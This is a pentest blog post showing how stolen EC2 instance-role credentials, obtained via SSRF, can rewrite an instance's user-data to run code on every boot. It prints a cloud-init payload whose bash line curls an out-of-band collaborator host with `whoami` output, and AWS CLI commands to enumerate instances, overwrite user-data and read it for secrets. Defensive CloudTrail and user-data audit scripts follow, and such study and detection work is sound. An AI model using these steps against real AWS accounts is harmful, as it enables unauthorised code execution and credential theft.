EC2 User-data to RCE

Hi guys, today we are going to see how a single AWS misconfiguration can lead to remote code execution on an EC2 instance. In the upcoming series of blogs, I will be sharing some of the techniques I use to get RCE on EC2 instances during different pentests.

What is User-data in EC2

According to AWS “When you launch an instance in Amazon EC2, you have the option of passing user data to the instance that can be used to perform common automated configuration tasks and even run scripts after the instance starts. You can pass two types of user data to Amazon EC2: shell scripts and cloud-init directives.” You can find more details here.

So let's get started

During a black box assessment, I was able to find an SSRF on an EC2 instance and was able to get IAM role credentials for the instance. You can find more details regarding EC2 SSRF here. For demo purposes, I have replicated the same scenario on my AWS infrastructure.


So the next question is: what now? What are those keys? How do I exploit those keys?

So whenever a developer wants an instance to access any other AWS service, they create an IAM role and then attach the IAM role to the instance. Using this role, the EC2 instance can access other AWS services during runtime. You can find more details on how to attach an IAM role to an EC2 instance here.

So the next question is how we find out which services these keys have access to during a black box assessment. I prefer using the tool weirdAAL for this.

WeirdAAL (AWS Attack Library): https://github.com/carnal0wnage/weirdAAL

So after enumeration, I was able to find that the keys have access to some EC2 APIs. If you face issues while running weirdAAL, you can refer to the following document.


I found that I was able to modify the instance user-data. User-data contains the shell script or cloud-init directives that the instance runs when it boots for the first time. After some research, I found that you can make cloud-init run the user scripts every time the system restarts. So I decided to use the following code. More details about the code can be found here.

Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
curl http://i6p76otpl9evztt3nec3dro1dsjj79vy.oastify.com/?a=`whoami`
--//--

Note: the user-data will be executed again when a stopped EC2 instance is started, so modify the instance attribute of a stopped instance. Then, whenever anyone starts the instance, your code will be loaded.

To enumerate all the instance IDs, I used the following command.

aws ec2 describe-instances --region ap-southeast-2 | grep InstanceId

To modify the user data, save your code base64-encoded in a file and use the following command.

aws ec2 modify-instance-attribute --instance-id i-087b2dfe70a253169 --attribute userData --value file://my_script_base64.txt --region ap-southeast-2
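From the defender's side, the ModifyInstanceAttribute call above is the event to watch for. The following is an added example (not from the original post) of a small detector run over constructed CloudTrail records: it flags any ModifyInstanceAttribute that touches userData, notes when the caller was an EC2 instance's own role session (an assumed-role ARN whose session name is an instance ID, which is what stolen instance-profile credentials look like), and links the change to a later StartInstances on the same instance. The record shapes, account IDs, role names, instance IDs and IP addresses are all constructed; in particular the assumption that the CLI form `--attribute userData` logs an `"attribute": "userData"` field while SDK calls log a `"userData"` key should be confirmed against your own account's events.

```python
import re
from datetime import datetime, timedelta

# EC2 instance ids: "i-" followed by 8 or 17 hex characters.
INSTANCE_ID = re.compile(r"^i-[0-9a-f]{8,17}$")

# Constructed CloudTrail records (not real account data), oldest first:
#  0) instance-role credentials used from outside the VPC to rewrite the
#     user-data of a *different*, stopped instance;
#  1) a benign ModifyInstanceAttribute (instance type) by an ops user;
#  2) the ops user later starts the tampered instance.
SAMPLE_EVENTS = [
    {
        "eventTime": "2023-11-02T09:10:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifyInstanceAttribute",
        "userIdentity": {
            "type": "AssumedRole",
            "arn": "arn:aws:sts::123456789012:assumed-role/WebAppRole/i-0abc1234def567890",
        },
        "sourceIPAddress": "203.0.113.10",
        "requestParameters": {"instanceId": "i-0fedcba9876543210", "attribute": "userData"},
    },
    {
        "eventTime": "2023-11-02T09:45:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "ModifyInstanceAttribute",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/ops"},
        "sourceIPAddress": "198.51.100.7",
        "requestParameters": {"instanceId": "i-0fedcba9876543210", "instanceType": {"value": "t3.small"}},
    },
    {
        "eventTime": "2023-11-02T10:30:00Z",
        "eventSource": "ec2.amazonaws.com",
        "eventName": "StartInstances",
        "userIdentity": {"type": "IAMUser", "arn": "arn:aws:iam::123456789012:user/ops"},
        "sourceIPAddress": "198.51.100.7",
        "requestParameters": {"instancesSet": {"items": [{"instanceId": "i-0fedcba9876543210"}]}},
    },
]


def touches_user_data(event):
    """True for a ModifyInstanceAttribute call that changes userData (either logged form)."""
    if event.get("eventName") != "ModifyInstanceAttribute":
        return False
    params = event.get("requestParameters") or {}
    return params.get("attribute") == "userData" or "userData" in params


def session_name(arn):
    """Last path element of an assumed-role ARN; EC2 instance profiles use the instance id here."""
    return arn.rsplit("/", 1)[-1] if "/" in arn else ""


def started_instances(event):
    """Instance ids named in a StartInstances request (constructed field layout)."""
    items = (event.get("requestParameters") or {}).get("instancesSet", {}).get("items", [])
    return {item.get("instanceId") for item in items}


def parse_time(value):
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def detect_user_data_tampering(events, start_window=timedelta(hours=24)):
    """Return one alert per userData change, enriched with who did it and whether
    the instance was started within `start_window` afterwards."""
    events = sorted(events, key=lambda e: e["eventTime"])
    alerts = []
    for idx, event in enumerate(events):
        if not touches_user_data(event):
            continue
        target = event["requestParameters"].get("instanceId")
        identity = event.get("userIdentity", {})
        session = session_name(identity.get("arn", ""))
        alert = {
            "time": event["eventTime"],
            "instance": target,
            "principal": identity.get("arn"),
            "source_ip": event.get("sourceIPAddress"),
            # Instance-role credentials rewriting user-data: the SSRF scenario in this post.
            "via_instance_role": identity.get("type") == "AssumedRole" and bool(INSTANCE_ID.match(session)),
            "started_after": None,
        }
        t0 = parse_time(event["eventTime"])
        for later in events[idx + 1:]:
            if (later.get("eventName") == "StartInstances"
                    and target in started_instances(later)
                    and parse_time(later["eventTime"]) - t0 <= start_window):
                alert["started_after"] = later["eventTime"]
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in detect_user_data_tampering(SAMPLE_EVENTS):
        print(alert)
```

Two things to keep in mind when wiring this into a real pipeline: CloudTrail does not carry the new user-data contents, so a hit should trigger a read of the attribute itself, and a web server's instance role almost never needs ec2:ModifyInstanceAttribute, so the cheapest fix is to remove that permission from the role rather than to detect its misuse after the fact.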

And once the EC2 instance was started again, I got the hit on my collaborator server.


Note: even if you are not able to modify the user-data, try to view it, as it may reveal secret information such as usernames, passwords, tokens, etc.

aws ec2 describe-instance-attribute --instance-id i-1234567890abcdef0 --attribute userData --query 'UserData.Value' --output text | base64 --decode
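The two notes above (the `[scripts-user, always]` directive that makes a script re-run on every boot, and the secrets that often sit in user-data) are both things an account owner can check for across a fleet. The following is an added example, not from the original post: a Python audit that takes the base64 value returned by describe-instance-attribute (or the raw text), splits the cloud-init multipart with the standard-library email parser, reports whether scripts-user is configured to run always, counts embedded shell scripts, and scans every part for credential-looking strings. The sample user-data is the post's multipart layout with two constructed credential lines added (AWS's documented example key id and a fake password) so the scan has something to find; the secret patterns are deliberately simple and are an assumption you would extend for your own environment.

```python
import base64
import binascii
import json
import re
from email import message_from_string

# Constructed sample: the post's cloud-init multipart, plus two made-up
# credential lines so the secret scan has something to report.
SAMPLE_USER_DATA = """Content-Type: multipart/mixed; boundary="//"
MIME-Version: 1.0

--//
Content-Type: text/cloud-config; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="cloud-config.txt"

#cloud-config
cloud_final_modules:
- [scripts-user, always]

--//
Content-Type: text/x-shellscript; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: attachment; filename="userdata.txt"

#!/bin/bash
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export DB_PASSWORD=hunter2
curl http://example.invalid/?a=`whoami`
--//--
"""

# Constructed stand-in for `aws ec2 describe-instance-attribute --attribute userData`
# output: the user-data arrives base64-encoded under UserData.Value.
SAMPLE_DESCRIBE_OUTPUT = json.dumps({
    "InstanceId": "i-0123456789abcdef0",
    "UserData": {"Value": base64.b64encode(SAMPLE_USER_DATA.encode()).decode()},
})

# Minimal credential patterns (an assumption; extend for your environment).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "password_assignment": re.compile(r"(?i)(pass(word)?|pwd|secret|token)\s*[=:]\s*\S+"),
}

# cloud-init's "run scripts-user on every boot" directive, in the list form the post uses.
ALWAYS_RERUN = re.compile(r"scripts-user\s*,\s*always")


def decode_user_data(value):
    """Accept base64 (as the API returns it) or raw text; a real script is
    practically never valid base64, so a failed strict decode means raw text."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return value


def split_parts(text):
    """Return (content_type, body) pairs for a MIME multipart or a bare script."""
    if text.lstrip().startswith("Content-Type:"):
        msg = message_from_string(text)
        return [(part.get_content_type(), part.get_payload(decode=True).decode("utf-8", "replace"))
                for part in msg.walk() if not part.is_multipart()]
    first_line = text.lstrip().splitlines()[0] if text.strip() else ""
    ctype = "text/cloud-config" if first_line.startswith("#cloud-config") else "text/x-shellscript"
    return [(ctype, text)]


def audit_user_data(value):
    """Summarise persistence and secret indicators in one instance's user-data."""
    findings = {"always_rerun": False, "shell_scripts": 0, "secrets": []}
    for ctype, body in split_parts(decode_user_data(value)):
        if ctype == "text/cloud-config" and ALWAYS_RERUN.search(body):
            findings["always_rerun"] = True
        if ctype == "text/x-shellscript":
            findings["shell_scripts"] += 1
        for name, pattern in SECRET_PATTERNS.items():
            for match in pattern.finditer(body):
                findings["secrets"].append((name, match.group(0)))
    return findings


def audit_describe_output(json_text):
    """Run the audit directly on describe-instance-attribute JSON output."""
    doc = json.loads(json_text)
    return audit_user_data(doc.get("UserData", {}).get("Value", ""))


if __name__ == "__main__":
    print(json.dumps(audit_describe_output(SAMPLE_DESCRIBE_OUTPUT), indent=2))
```

Run it across every instance in a region and the two findings to act on are an unexpected `always_rerun` (legitimate images rarely need user scripts on every boot) and any secret hit at all, since anything with ec2:DescribeInstanceAttribute on the instance, including the instance's own role in the scenario above, can read that text.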

Reference: — https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/user-data.html.

Originally published by Rounak Dhadiwal: EC2 User-data to RCE

Posted by admin on 2 November 2023, 9:19 PM.